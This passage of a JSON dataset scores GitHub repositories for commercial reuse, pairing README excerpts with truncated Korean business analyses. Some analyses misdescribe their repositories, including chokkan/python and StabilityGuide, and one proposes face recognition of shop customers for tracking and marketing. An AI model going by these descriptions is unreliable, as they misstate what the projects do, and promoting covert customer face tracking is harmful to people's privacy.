organic compounds(TVOC) including Hydrogen and Ethenol (GY-SGP30","composite_score":0.3706,"license_safety_tag":"safe"},{"name":"seetaface/SeetaFaceEngine","github_url":"https://github.com/seetaface/SeetaFaceEngine","stars":5,"language":"C++","license":"bsd-2-clause","abandonment_months":75,"description":"# SeetaFaceEngine 사업화 분석\n\n## 왜 보물인가\n사진이나 영상에서 사람의 얼굴을 자동으로 인식하고 분석하는 기술로, 보안·출입통제·마케팅 등 다양한 산업에 필수적인 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 편의점·카페에서 고객 얼굴 인식으로 방문 패턴 분석 및 개인화 마케팅 서비스\n- **내부 업무 도구**:","readme_excerpt":"## SeetaFace Engine  \n\n[![License](https://img.shields.io/badge/license-BSD-blue.svg)](LICENSE)\n\n### Description\n\n**SeetaFace Engine** is an open source C++ face recognition engine, which can run on CPU with no third-party dependence. It contains three key parts, i.e., **SeetaFace Detection**, **SeetaFace Alignment** and **SeetaFace Identification**, which are necessary and sufficient for building a real-world face recognition applicaiton system. \n\n* SeetaFace Detection implements a funnel-structured (FuSt) cascade schema for real-time multi-view face detection, which achieves a good trade-off between detection accuracy and speed. State of the art accuracy can be achieved on the public dataset [FDDB](http://vis-www.cs.umass.edu/fddb/) in high speed. See [SeetaFace Detection](https://github.com/seetaface/SeetaFaceEngine/tree/master/FaceDetection) for more details. \n\n* SeetaFace Alignment cascades several stacked auto-encoder networks to detect landmarks in real time (more than 200 fps o","composite_score":0.3704,"license_safety_tag":"safe"},{"name":"chokkan/python","github_url":"https://github.com/chokkan/python","stars":5,"language":"Jupyter Notebook","license":"NOASSERTION","abandonment_months":18,"description":"# chokkan/python 저장소 분석\n\n## 왜 보물인가\nPython 프로그래밍 언어 자체를 개선하거나 확장하는 핵심 기술로, 전 세계 수백만 개발자가 의존하는 기반이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **내부 업무 도구**: 기업의 데이터 처리나 자동화 작업을 더 빠르고 효율적으로 만드는 도구로 판매\n2. **SaaS 서비스**: ","readme_excerpt":"# Python早見帳\n\nPython早見帳は、プログラミング言語Pythonを素早く概観（**早見**）するノート（**帳**）です。\n","composite_score":0.3703,"license_safety_tag":"unknown"},{"name":"JackyAndroid/AndroidInterview-Q-A","github_url":"https://github.com/JackyAndroid/AndroidInterview-Q-A","stars":17,"language":"JavaScript","license":"unknown","abandonment_months":35,"description":"# AndroidInterview-Q-A 분석\n\n## 왜 보물인가\n안드로이드 앱 개발자들이 취업 면접을 준비할 때 필요한 질문과 답변을 정리한 학습 자료로, 개발자 채용 시장에서 수요가 높은 교육 콘텐츠입니다.\n\n## 어디에 쓸 수 있나\n\n1. **개발자 교육 플랫폼**: 인프런, 동빅 같은 강의 플랫폼에서 \"안드로이드 면접 준비 과정\"을 구독형 서비스로 ","readme_excerpt":"### The top Internet companies android interview questions and answers\n\n[![](https://badge.juejin.im/entry/578d938079bc44005ff26aec/likes.svg?style=flat)](https://juejin.im/entry/578d938079bc44005ff26aec/detail)\n\n[Github Repo](https://github.com/JackyAndroid/AndroidInterview-Q-A) welcome star | Github 仓库 欢迎star\n\n[Online Doc | 在线文档](https://jackyandroid.github.io/AndroidInterview-Q-A/)\n","composite_score":0.3701,"license_safety_tag":"unknown"},{"name":"GoesToEleven/golang-web-dev","github_url":"https://github.com/GoesToEleven/golang-web-dev","stars":5,"language":"Go","license":"unknown","abandonment_months":27,"description":"# GoesToEleven/golang-web-dev 보물 평가\n\n## 왜 보물인가\n웹사이트를 빠르고 안정적으로 만드는 기술을 배우고 실제로 적용할 수 있는 완성된 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 스타트업이 웹사이트 개발 교육 플랫폼으로 유료화하여 월 구독료 수취\n2. **내부 업무 도구**: 개발 팀이 없는","readme_excerpt":"","composite_score":0.3701,"license_safety_tag":"unknown"},{"name":"kevinzhow/PNChart","github_url":"https://github.com/kevinzhow/PNChart","stars":7,"language":"Objective-C","license":"mit","abandonment_months":96,"description":"# PNChart 프로젝트 분석\n\n## 왜 보물인가\n스마트폰 앱에서 데이터를 예쁜 그래프와 차트로 표현할 수 있게 해주는 기술로, 금융·의료·분석 앱들이 필수적으로 필요로 합니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 개인 금융 관리 앱**\n- 월별 소비 내역을 시각적 차트로 보여주는 가계부 앱에 통합하여 사용자 경험 향상\n\n**2. 내부","readme_excerpt":"# PNChart\n\n[![Build Status](https://travis-ci.org/kevinzhow/PNChart.png?branch=master)](https://travis-ci.org/kevinzhow/PNChart)\n\nYou can also find swift version at here https://github.com/kevinzhow/PNChart-Swift\n\nA simple and beautiful chart lib with **animation** used in [Piner](https://itunes.apple.com/us/app/piner/id637706410) and [CoinsMan](https://itunes.apple.com/us/app/coinsman/id772163893) for iOS\n\n[![](https://s3.amazonaws.com/farshid.ghods.github/pnchart-gif.gif)](https://s3.amazonaws.com/farshid.ghods.github/pnchart-gif.gif)\n\n## Requirements\n\nPNChart works on iOS 7.0+ and is compatible with ARC projects.\nIf you need support for iOS 6, use PNChart <= 0.8.1. Note that 0.8.2 supports iOS 8.0+ only, 0.8.3 and newer supports iOS 7.0+.\n\nIt depends on the following Apple frameworks, which should already be included with most Xcode templates:\n\n* Foundation.framework\n* UIKit.framework\n* CoreGraphics.framework\n* QuartzCore.framework\n\nYou will need LLVM 3.0 or later in order to build ","composite_score":0.3698,"license_safety_tag":"safe"},{"name":"rwaldron/johnny-five","github_url":"https://github.com/rwaldron/johnny-five","stars":6,"language":"JavaScript","license":"NOASSERTION","abandonment_months":31,"description":"# Johnny-Five 저장소 분석\n\n## 왜 보물인가\n누구나 쉽게 로봇이나 전자기기를 프로그래밍할 수 있도록 만든 오픈소스 도구로, 복잡한 기술 지식 없이도 하드웨어를 제어할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **교육용 SaaS 플랫폼**: 학생들이 온라인에서 가상 로봇을 조종하고 학습하는 구독 기반 서비스\n2. **기업 자동화 도구**:","readme_excerpt":"![](https://github.com/rwaldron/johnny-five/raw/main/assets/sgier-johnny-five.png)\n\n# Johnny-Five\n### The JavaScript Robotics Programming Framework\n\n<!-- \n\n    Hello!\n\n    Please don't edit this file!\n\n    If you'd like to make changes to the readme contents, please make them in the tpl/.readme.md file. If you'd like to add an example: \n\n    1. Add the file in `eg/`\n    2. Add a breadboard image in `docs/breadboards`\n    3. Add an entry to `tpl/programs.json`. \n    4. Generated the markdown with: `grunt examples`\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n-->\n\n\n_Artwork by [Mike Sgier](http://msgierillustration.com)_\n\n[![Build, Lint, Test and Measure Coverage](https://github.com/rwaldron/johnny-five/actions/workflows/npm-grunt.yml/badge.svg)](https://github.com/rwaldron/johnny-five/actions)\n[![Appveyor Build Status](https://ci.appveyor.com/api/projects/status/hmke71k7uemtnami/branch/main?svg=true)](https://ci.appveyor.com/project/rwaldron/johnny-five)\n[![Coverage Status](https://coveralls.","composite_score":0.3695,"license_safety_tag":"unknown"},{"name":"Bombfuse/emerald","github_url":"https://github.com/Bombfuse/emerald","stars":7,"language":"Rust","license":"MIT","abandonment_months":18,"description":"# Emerald 저장소 분석\n\n## 왜 보물인가\n게임 개발이나 그래픽 프로그래밍이 필요한 프로젝트에서 복잡한 코딩을 간단하게 만들어주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **게임 개발 SaaS**: 초보 게임 개발자를 위한 온라인 게임 제작 플랫폼으로 구독료 수거\n2. **내부 업무 도구**: 게임사나 크리에이티브 회사의 팀원들이 공유하는 그래","readme_excerpt":"![Emerald](./assets/banner_large.png)\n[![Crates.io](https://img.shields.io/crates/v/emerald.svg)](https://crates.io/crates/emerald)\n[![License: MIT](https://img.shields.io/badge/License-MIT-green.svg)](https://opensource.org/licenses/MIT)\n[![Discord chat](https://img.shields.io/discord/829494628771168296.svg?label=discord%20chat)](https://discord.gg/NHsz38AhkD)\n\n\n# The Cross Platform Engine\n\nEmerald is designed to be as lightweight as possible, while remaining a fully-featured and cross-platform game engine.\n\nThe api is simple and powerful, giving you direct access to physics, audio, graphics, game worlds, and asset loading.\n\n## Supported Platforms\n<div>\n    <img alt=\"MacOS\" src=\"./assets/apple.svg\" width=32>\n    <img alt=\"Linux\" src=\"./assets/linux.svg\" width=32>\n    <img alt=\"Windows\" src=\"./assets/windows.svg\" width=32>\n    <img alt=\"RaspberryPi\" src=\"./assets/raspberrypi.svg\" width=32>\n</div>\n\n\n--- Work in progress ---\n<div>\n    <img alt=\"Android\" src=\"./assets/android.svg\" width=3","composite_score":0.3691,"license_safety_tag":"safe"},{"name":"StabilityMan/StabilityGuide","github_url":"https://github.com/StabilityMan/StabilityGuide","stars":14,"language":"","license":"NOASSERTION","abandonment_months":17,"description":"# StabilityGuide 상업화 분석\n\n## 왜 보물인가\nAI 모델을 안정적으로 운영하기 위한 실용적인 가이드를 체계적으로 정리한 자료로, 기업들이 AI 도입 시 겪는 안정성 문제를 미리 해결할 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- AI 모델 안정성 진단 및 컨설팅 플랫폼 운영\n- 기업 고객이 자사 AI 시스","readme_excerpt":"\n[![license](https://badgen.net/badge/license/CC-BY-4.0/green)](https://creativecommons.org/licenses/by-sa/4.0/deed.zh)\n[![github](https://badgen.net/badge/github/StabilityGuide/orange)](https://github.com/StabilityMan/StabilityGuide)\n[![document](https://badgen.net/badge/document/stabilityman.github.io/red)](https://stabilityman.github.io)\n[![chat](https://badgen.net/badge/chat/dingding/blue)](https://github.com/StabilityMan/StabilityGuide/blob/master/DingGroup_2.png)\n\n\n> 稳定性之于系统，就像健康之于人类，看起来重要不紧急，然而一旦失去，就追悔莫及。\n\n> 稳定性是一切 0 前面的 1。\n\n## 为什么要做这个专栏？\n* **让无法解决的问题少一点点，让世界的确定性多一点点。**\n* 打造国内稳定性领域知识库，降低知识获取门槛。\n\n\n## 加入我们\n* [GitHub 地址](https://github.com/StabilityMan/StabilityGuide)\n* [在线文档站（阅读体验更佳）](https://stabilityman.github.io)\n* 钉钉群号\n  * 30000312（2群，推荐） \n  * 23179349（1群，已满）\n* 如果你在本专栏有所收获，欢迎分享给身边的朋友，期待更多同学的加入！\n\n## 框架目录\n### 0. 故障案例\n###### [【必读】故障案例征集 & Demo 模板.md](docs/case/【必读】故障案例征集&Demo模板.md)\n###### [【案例】Dubbo 稳定性：Nacos 注册中心可用性问题复盘](docs/case/【案例】Dubbo稳定性_Nacos注册中心可用性问题复盘.md)\n###### [【案例】记一","composite_score":0.369,"license_safety_tag":"unknown"},{"name":"dzenbot/DZNEmptyDataSet","github_url":"https://github.com/dzenbot/DZNEmptyDataSet","stars":5,"language":"Objective-C","license":"mit","abandonment_months":47,"description":"# DZNEmptyDataSet 분석 보고서\n\n## 왜 보물인가\n앱이나 웹사이트에서 데이터가 없을 때 사용자에게 보여줄 깔끔한 화면을 쉽게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- 전자상거래 플랫폼에서 고객이 주문 목록이 비어있을 때 친절한 안내 화면을 표시\n\n**2. 내부 업무 도구**\n- 기업의 직원 관리 ","readme_excerpt":"DZNEmptyDataSet\n=================\n\n[![Travis](https://travis-ci.org/dzenbot/DZNEmptyDataSet.svg?branch=master)](https://travis-ci.org/dzenbot/DZNEmptyDataSet.svg?branch=master)\n[![codecov](https://codecov.io/gh/dzenbot/DZNEmptyDataSet/badge.svg)](https://codecov.io/gh/dzenbot/DZNEmptyDataSet)\n[![Pod Version](http://img.shields.io/cocoapods/v/DZNEmptyDataSet.svg)](http://cocoadocs.org/docsets/DZNEmptyDataSet/)\n[![Carthage compatible](https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat)](https://github.com/Carthage/Carthage)\n[![License](http://img.shields.io/badge/license-MIT-blue.svg)](http://opensource.org/licenses/MIT)\n\n### Projects using this library\n\n[Add your project to the list here](https://github.com/dzenbot/DZNEmptyDataSet/wiki/Projects-using-DZNEmptyDataSet) and provide a (320px wide) render of the result.\n\n\n### The Empty Data Set Pattern\nAlso known as *[Empty State](http://emptystat.es/)* or *[Blank Slate](http://patternry.com/p=blank-slate/)*.\n\nMost applic","composite_score":0.3689,"license_safety_tag":"safe"},{"name":"google/tink","github_url":"https://github.com/google/tink","stars":7,"language":"Java","license":"apache-2.0","abandonment_months":26,"description":"# Google Tink 프로젝트 분석\n\n## 왜 보물인가\nGoogle이 만든 이 기술은 일반인도 쉽게 사용할 수 있는 '보안 도구 상자'로, 은행이나 결제 서비스처럼 돈과 개인정보를 다루는 회사들이 해킹으로부터 안전하게 보호할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **금융 SaaS 서비스**: 송금 앱, 투자 플랫폼 등이 고객의 계좌 정보","readme_excerpt":"# Tink\n\n> **NOTE**: **Tink moved to github.com/tink-crypto and this repo is no longer\n> active!**\n>\n> As planned, we have split Tink into\n> [multiple GitHub repositories][split_repo_roadmap_url] that are hosted at\n> [github.com/tink-crypto](https://github.com/tink-crypto). As a consequence, we\n> made this repository read-only and it is not going to be maintained moving\n> forward.\n>\n\n*A multi-language, cross-platform library that provides cryptographic APIs that\nare secure, easy to use correctly, and hard(er) to misuse. See also:\nhttps://developers.google.com/tink*.\n\n[split_repo_roadmap_url]: https://developers.google.com/tink/roadmap#splitting_tink_into_multiple_github_repositories\n[tink_mailing_list_url]: https://groups.google.com/forum/#!forum/tink-users\n\n## Index\n\n1.  [Introduction](#introduction)\n2.  [Current status](#current-status)\n3.  [Getting started](#getting-started)\n4.  [Learn more](#learn-more)\n5.  [Contact and mailing list](#contact-and-mailing-list)\n6.  [Maintainers](#mai","composite_score":0.3689,"license_safety_tag":"safe"},{"name":"SpexGuy/Zig-Oculus-Quest","github_url":"https://github.com/SpexGuy/Zig-Oculus-Quest","stars":14,"language":"Zig","license":"NOASSERTION","abandonment_months":18,"description":"# Zig-Oculus-Quest 저장소 분석\n\n## 왜 보물인가\n메타 퀘스트 VR 헤드셋에서 게임과 앱을 만들기 위한 프로그래밍 도구로, 아직 많은 개발자가 사용하지 않는 틈새 기술이기에 경쟁이 적습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: VR 개발자를 위한 온라인 코딩 환경 또는 템플릿 판매 플랫폼\n- **내부 업무 도구**: 기업","readme_excerpt":"# Oculus Quest Apps in Zig\n\n![Project banner](design/logo.png)\n\nThis repository contains a example on how to create a minimal Oculus Quest app in Zig.\n\nThis is a proof of concept, and is not suitable for production use.  PLEASE DON'T BUILD ACTUAL APPS WITH THIS TEMPLATE!  The threading model between the event threads and main thread needs revising to be considered robust, and the bindings to vrapi are largely untested, aside from what is present in the example.  Also, Zig as a whole is not ready for production use yet.\n\n## State of the project\n\nThis project contains a small app skeleton in `example/main.zig` which renders a field of spinning cubes, based on the cube world sample from the Oculus SDK.  `build.zig` is an example project build file, and `Sdk.zig` contains the reusable components of the build.\n\nThis project is looking for a maintainer!  If you would like to take on the responsibility of updating this to new versions of zig, or adding missing examples, please reach out!\n\n## ","composite_score":0.3689,"license_safety_tag":"unknown"},{"name":"paritytech/parity","github_url":"https://github.com/paritytech/parity","stars":6,"language":"Rust","license":"NOASSERTION","abandonment_months":68,"description":"# Parity 저장소 분석\n\n## 왜 보물인가\n블록체인 기술의 핵심 인프라를 만드는 팀의 오픈소스 프로젝트로, 암호화폐와 Web3 생태계의 기반이 되는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **블록체인 노드 운영 서비스**: 암호화폐 거래소나 지갑 회사가 자체 블록체인 네트워크를 운영할 때 필요한 인프라 제공\n2. **엔터프라이즈 블록체인 솔루션*","readme_excerpt":"![Parity Ethereum](docs/logo-parity-ethereum.svg)\n\n<h2 align=\"center\">The Fastest and most Advanced Ethereum Client.</h2>\n\n<p align=\"center\"><strong><a href=\"https://github.com/paritytech/parity-ethereum/releases/latest\">» Download the latest release «</a></strong></p>\n\n<p align=\"center\"><a href=\"https://gitlab.parity.io/parity/parity-ethereum/commits/master\" target=\"_blank\"><img src=\"https://gitlab.parity.io/parity/parity-ethereum/badges/master/build.svg\" /></a>\n<a href=\"https://www.gnu.org/licenses/gpl-3.0.en.html\" target=\"_blank\"><img src=\"https://img.shields.io/badge/license-GPL%20v3-green.svg\" /></a></p>\n\n## Table of Contents\n\n1. [Description](#chapter-001)\n2. [Technical Overview](#chapter-002)\n3. [Building](#chapter-003)<br>\n  3.1 [Building Dependencies](#chapter-0031)<br>\n  3.2 [Building from Source Code](#chapter-0032)<br>\n  3.3 [Simple One-Line Installer for Mac and Linux](#chapter-0033)<br>\n  3.4 [Starting Parity Ethereum](#chapter-0034)\n4. [Testing](#chapter-004)\n5. [Documen","composite_score":0.3685,"license_safety_tag":"unknown"},{"name":"laobie/StatusBarUtil","github_url":"https://github.com/laobie/StatusBarUtil","stars":10,"language":"Java","license":"apache-2.0","abandonment_months":48,"description":"# StatusBarUtil 상용화 분석\n\n## 왜 보물인가\n스마트폰 화면 위쪽의 상태 표시줄(시간, 배터리, 신호 등)을 원하는 대로 꾸밀 수 있는 기술로, 앱의 외관을 더 세련되게 만들어주는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **앱 개발사의 커스터마이징 서비스**: 프리미엄 앱에서 상태 표시줄 색상을 브랜드에 맞게 변경해주는 유료 기능 추가\n-","readme_excerpt":"# StatusBarUtil\n\n[![996.icu](https://img.shields.io/badge/link-996.icu-red.svg)](https://996.icu)\n\n[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-StatusBarUtil-green.svg?style=true)](https://android-arsenal.com/details/1/3341)\n\n[ ![Download](https://api.bintray.com/packages/laobie/maven/StatusBarUtil/images/download.svg) ](https://bintray.com/laobie/maven/StatusBarUtil/_latestVersion)\n\nA util for setting status bar style on Android App. It can work above API 19(KitKat 4.4).\n\n\n[中文版点我](http://laobie.github.io/android/2016/03/27/statusbar-util.html)\n\n![](https://s9.postimg.cc/3p0itrz67/DRIVE_2.png)\n\n### Sample\n\n[Download StatusBarUtil-Demo](http://fir.im/5mnp)\n\n### ChangeLog \n\n[CLICK ME](CHANGE_LOG.md)\n\n### Usage\n\n1. Add the dependencies to your build.gradle file, StatusBarUtil is avaiable in JCenter:\n\n   ```groovy\n   compile 'com.jaeger.statusbarutil:library:1.5.1'\n   ```\n\n   I fixed typo, change \"statusbaruitl\" to \"statusbarutil\", please notice this.\n\n2. Call method ","composite_score":0.3685,"license_safety_tag":"safe"},{"name":"JasonGT/CleanArchitecture","github_url":"https://github.com/JasonGT/CleanArchitecture","stars":5,"language":"C#","license":"MIT","abandonment_months":0,"description":"# CleanArchitecture 저장소 분석\n\n## 왜 보물인가\n복잡한 소프트웨어를 체계적으로 만드는 방법론을 실제 코드로 보여주는 교과서 같은 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 여러 팀이 함께 개발하는 웹 기반 구독 서비스(예: 프로젝트 관리 도구)의 기초 구조로 활용\n2. **내부 업무 도구**: 중소 회사의 인사","readme_excerpt":"# Clean Architecture Solution Template\n\n[![Build](https://github.com/jasontaylordev/CleanArchitecture/actions/workflows/build.yml/badge.svg)](https://github.com/jasontaylordev/CleanArchitecture/actions/workflows/build.yml)\n[![CodeQL](https://github.com/jasontaylordev/CleanArchitecture/actions/workflows/codeql.yml/badge.svg)](https://github.com/jasontaylordev/CleanArchitecture/actions/workflows/codeql.yml)\n[![Nuget](https://img.shields.io/nuget/v/Clean.Architecture.Solution.Template?label=NuGet)](https://www.nuget.org/packages/Clean.Architecture.Solution.Template)\n[![Nuget](https://img.shields.io/nuget/dt/Clean.Architecture.Solution.Template?label=Downloads)](https://www.nuget.org/packages/Clean.Architecture.Solution.Template)\n![Twitter Follow](https://img.shields.io/twitter/follow/jasontaylordev?label=Follow&style=social)\n\nThe goal of this template is to provide a straightforward and efficient approach to enterprise application development, leveraging the power of Clean Architecture an","composite_score":0.3684,"license_safety_tag":"safe"},{"name":"kvhnuke/etherwallet","github_url":"https://github.com/kvhnuke/etherwallet","stars":10,"language":"JavaScript","license":"mit","abandonment_months":79,"description":"# etherwallet 저장소 분석\n\n## 왜 보물인가\n암호화폐 지갑을 직접 만들고 관리할 수 있는 도구로, 은행 없이 자신의 자산을 완전히 통제하려는 사람들에게 필수적인 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **암호화폐 거래소**: 사용자가 자신의 자산을 안전하게 보관할 수 있는 지갑 기능을 제공하는 서비스로 통합\n2. **블록체인 애플리케이션*","readme_excerpt":"### [https://www.MyEtherWallet.com](https://www.MyEtherWallet.com)\n\n### [Chrome Extension](https://chrome.google.com/webstore/detail/myetherwallet-cx/nlbmnnijcnlegkjjpcfjclmcfggfefdm)\n\n### [Download the Latest Release](https://github.com/kvhnuke/etherwallet/releases/latest)\n\n- etherwallet-vX.X.X.X.zip is the smaller package containing the gh-pages branch aka MyEtherWallet.com\n- chrome-extension-vX.X.X.X.zip is the chrome extension package\n- source code is the full source for developers to get started with (although cloning or forking the mercury branch is probably a better choice)\n\n### Live verify files\nCheck gh-pages files against live website at https://www.myetherwallet.com\n\n| File Name| Status|\n|---|---|\n| index.html |![embedded.html](https://filechecker.myetherwallet.com/check?localFile=https://raw.githubusercontent.com/kvhnuke/etherwallet/gh-pages/index.html&remoteFile=https://www.myetherwallet.com/index.html)|\n| embedded.html |![embedded.html](https://filechecker.myetherwallet.c","composite_score":0.368,"license_safety_tag":"safe"},{"name":"Blankj/awesome-java-leetcode","github_url":"https://github.com/Blankj/awesome-java-leetcode","stars":5,"language":"Java","license":"unknown","abandonment_months":66,"description":"# Blankj/awesome-java-leetcode 평가 보고서\n\n## 왜 보물인가\n프로그래밍 면접에 필요한 문제 풀이법을 체계적으로 정리한 학습 자료로, 개발자 채용 준비생들에게 실질적인 가치를 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 학습 플랫폼**: 코딩 면접 준비 강좌와 문제풀이 가이드를 제공하는 구독형 교육 서비스\n2. **기업 ","readme_excerpt":"# awesome-java-leetcode\n\n我如今是一名 Android Developer，大学的我曾是一名 ACMer，我一直认为数据结构和算法是作为一名程序员必须掌握和善于利用的，为了不让数据结构和算法淡出我的记忆，所以我打算重拾 LeetCode 之 Algorithm，语言选择的是 Java，题库会一点点完善起来，按简单，中等，困难分类，相应难度下按题号排序，源代码在 [src][src] 目录中，相关解题都在 [note][note] 目录中，想要学习数据结构和算法或打算刷 LeetCode 的小伙伴们欢迎 star 哦。\n\n如今有机会面试 Facebook，附上 LeetCode 上 Facebook 的面试题目序号，希望可以帮助到以后想入 Facebook 的小伙伴:-)\n\n```\n1,10,13,15,17,20,23,25,26,28,33,38,43,44,49,50,56,57,67,68,69,71,75,76\n78,79,80,85,88,90,91,98,102,117,121,125,127,128,133,139,146,157,158,161\n168,173,200,206,208,209,210,211,215,218,221,234,235,236,238,252,253,257\n261,265,269,273,274,275,277,278,282,283,285,286,297,301,311,314,325,334\n341,377,380,398,404,410,461,477,494,523,525,534,535,543,554\n```\n\n如果想知道更多公司 LeetCode 面试题，可以参看 [Companies.md][companies]。\n\n附上镇楼诗：\n\n> 明有科举八股，今有 LeetCode。  \n> 八股定格式而取文采心意，LeetCode 定题目且重答案背诵。  \n> 美其名曰：\"practice makes perfect.\"  \n> 为何今不如古？  \n> 非也非也，  \n> 科举为国取士，LeetCode 为 Google 筛码工，各取所需也。  \n\n## Easy\n\n| #    | Title                                              ","composite_score":0.3679,"license_safety_tag":"unknown"},{"name":"airbnb/react-dates","github_url":"https://github.com/airbnb/react-dates","stars":5,"language":"JavaScript","license":"mit","abandonment_months":26,"description":"# react-dates 상용화 분석\n\n## 왜 보물인가\n캘린더와 날짜 선택 기능이 필요한 모든 웹사이트에서 바로 사용할 수 있는 완성도 높은 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **여행 예약 SaaS**: 호텔/항공사 예약 서비스의 체크인·체크아웃 날짜 선택 기능으로 제공\n2. **내부 업무 도구**: 회사 일정 관리, 휴가 신청, 프로젝트 일","readme_excerpt":"# react-dates <sup>[![Version Badge][npm-version-svg]][package-url]</sup>\n\n[![Build Status][travis-svg]][travis-url]\n[![dependency status][deps-svg]][deps-url]\n[![dev dependency status][dev-deps-svg]][dev-deps-url]\n[![License][license-image]][license-url]\n[![Downloads][downloads-image]][downloads-url]\n\n[![npm badge][npm-badge-png]][package-url]\n\n> An easily internationalizable, accessible, mobile-friendly datepicker library for the web.\n\n![react-dates in action](https://raw.githubusercontent.com/react-dates/react-dates/HEAD/react-dates-demo.gif)\n\n## Live Playground\n\nFor examples of the datepicker in action, go to [react-dates.github.io](https://react-dates.github.io/react-dates/).\n\nOR\n\nTo run that demo on your own computer:\n* Clone this repository\n* `npm install`\n* `npm run storybook`\n* Visit http://localhost:6006/\n\n## Getting Started\n### Install dependencies\nEnsure packages are installed with correct version numbers by running (from your command line):\n  ```sh\n  (\n    export PKG=react","composite_score":0.3673,"license_safety_tag":"safe"},{"name":"mixandjam/Jammo-Character","github_url":"https://github.com/mixandjam/Jammo-Character","stars":18,"language":"C#","license":"MIT","abandonment_months":14,"description":"","readme_excerpt":"# Jammo-Character \n\n![Jammo Banner](https://github.com/mixandjam/Jammo-Character/blob/master/git-banner.jpg)\n\nThe <b>Jammo Character</b> is a free 3D model that you can use in your projects!\n\nJammo is part of a collaboration between the [Mix and Jam](https://bit.ly/mixandjam) and [Curiomatic](https://youtube.com/curiomatic) Youtube channels.\n\nThe model rig was carefully tweaked to work with the [Mixamo](https://www.mixamo.com/#) website - which means that you can just drag the .fbx file there and try the variety of animations available on Mixamo's library!\n\n>[Blender and Substance files](http://bit.ly/jammoDB)<br>\n>[Asset Store Link](http://u3d.as/1G8A)<br>\n\n• Triangle count: 16.088<br>\n• Material count: 2 (Body and head visor)<br>\n• Available textures: Albedo, Metallic Smoothness, Normal Map and Ambient Occlusion.<br>\n• Example Scenes: Third person camera control (using Cinemachine) with an example movement script.\n\nWe hope you have a lot of fun with the character! \n\n## Downloading an","composite_score":0.3671,"license_safety_tag":"safe"},{"name":"bilibili/kratos","github_url":"https://github.com/bilibili/kratos","stars":12,"language":"Go","license":"MIT","abandonment_months":0,"description":"# Bilibili/Kratos 상품화 분석\n\n## 왜 보물인가\n동영상 플랫폼의 기술을 기반으로 만든 이 도구는 대규모 트래픽을 안정적으로 처리하는 능력이 뛰어나므로, 인기 있는 서비스를 만들려는 회사들에게 매력적입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 라이브 스트리밍 플랫폼 구축**\n유튜브나 트위치 같은 동영상 중계 서비스를 새로 만들거나 개선할 때","readme_excerpt":"<p align=\"center\"><a href=\"https://go-kratos.dev/\" target=\"_blank\"><img src=\"https://github.com/go-kratos/kratos/blob/main/docs/images/kratos-large.png?raw=true\"></a></p>\n\n<p align=\"center\">\n<a href=\"https://github.com/go-kratos/kratos/actions\"><img src=\"https://github.com/go-kratos/kratos/workflows/Go/badge.svg\" alt=\"Build Status\"></a>\n<a href=\"https://pkg.go.dev/github.com/go-kratos/kratos/v2\"><img src=\"https://pkg.go.dev/badge/github.com/go-kratos/kratos/v2\" alt=\"GoDoc\"></a>\n<a href=\"https://deepwiki.com/go-kratos/kratos\"><img src=\"https://img.shields.io/badge/DeepWiki-go--kratos%2Fkratos-blue.svg?logo=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACwAAAAyCAYAAAAnWDnqAAAAAXNSR0IArs4c6QAAA05JREFUaEPtmUtyEzEQhtWTQyQLHNak2AB7ZnyXZMEjXMGeK/AIi+QuHrMnbChYY7MIh8g01fJoopFb0uhhEqqcbWTp06/uv1saEDv4O3n3dV60RfP947Mm9/SQc0ICFQgzfc4CYZoTPAswgSJCCUJUnAAoRHOAUOcATwbmVLWdGoH//PB8mnKqScAhsD0kYP3j/Yt5LPQe2KvcXmGvRHcDnpxfL2zOYJ1mFwrryWTz0advv1Ut4CJgf5uhDuDj5eUcAUoahrdY/56ebRWeraTjMt/00Sh3UDtjgHtQNHwcR","composite_score":0.3666,"license_safety_tag":"safe"},{"name":"XXApple/AndroidLibs","github_url":"https://github.com/XXApple/AndroidLibs","stars":10,"language":"","license":"apache-2.0","abandonment_months":74,"description":"# XXApple/AndroidLibs 분석\n\n## 왜 보물인가\n안드로이드 앱 개발에 필요한 유용한 도구 모음을 제공하여, 개발자들이 반복적인 작업을 줄일 수 있게 해주는 라이브러리입니다.\n\n## 어디에 쓸 수 있나\n1. **안드로이드 앱 개발 서비스**: 개발사들이 이 라이브러리를 구독하여 앱 만드는 시간을 단축하고 비용을 절감할 수 있습니다.\n2. **","readme_excerpt":"# AndroidLibs\n\n收集Android开发中优秀的开源组件库，方便大家查询，欢迎 PR 和 star~\n\n---\n\n### 目录 Catalogue\n\n\n- [列表List](https://github.com/XXApple/AndroidLibs/tree/master/%E5%88%97%E8%A1%A8List) \n- [动画Animation](https://github.com/XXApple/AndroidLibs/tree/master/%E5%8A%A8%E7%94%BBAnimation)\n- [图标Icon](https://github.com/XXApple/AndroidLibs/tree/master/%E5%9B%BE%E6%A0%87Icon)\n- [图片框架Image](https://github.com/XXApple/AndroidLibs/tree/master/%E5%9B%BE%E7%89%87%E6%A1%86%E6%9E%B6Image)\n- [图表Chart](https://github.com/XXApple/AndroidLibs/tree/master/%E5%9B%BE%E8%A1%A8Chart)\n- 